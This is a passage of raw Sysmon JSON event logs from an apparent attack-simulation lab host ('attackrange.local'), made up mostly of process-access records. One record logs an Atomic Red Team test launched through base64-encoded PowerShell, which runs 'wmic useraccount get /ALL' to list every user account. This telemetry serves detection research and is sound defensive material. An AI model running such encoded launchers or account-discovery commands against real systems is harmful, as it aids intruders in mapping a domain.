{41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.377","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5197,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.377\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.377","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5198,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.377\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.377","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5199,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.377\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.377","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5200,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.377\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.377","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5201,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.377\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-0010133D0800}\r\nTargetProcessId: 1184\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.377","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-0010133D0800}","TargetProcessId":"1184","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5202,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:13.377\r\nProcessGuid: {41C8662E-20D1-5F25-0000-001065390800}\r\nProcessId: 3904\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\g41gztmo\\g41gztmo.dll\r\nCreationUtcTime: 2020-08-01 07:59:13.315","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:13.377","ProcessGuid":"{41C8662E-20D1-5F25-0000-001065390800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\g41gztmo\\g41gztmo.dll","CreationUtcTime":"2020-08-01 07:59:13.315","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5203,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.839\r\nProcessGuid: {41C8662E-20D1-5F25-0000-00108C3E0800}\r\nProcessId: 668\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"wmic useraccount get /ALL /format:csv\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nParentProcessId: 2992\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.839","ProcessGuid":"{41C8662E-20D1-5F25-0000-00108C3E0800}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic useraccount get /ALL /format:csv\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-20D0-5F25-0000-0010871B0800}","ParentProcessId":"2992","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5204,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.830\r\nSourceProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nSourceProcessId: 2992\r\nSourceThreadId: 5056\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-00108C3E0800}\r\nTargetProcessId: 668\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663735c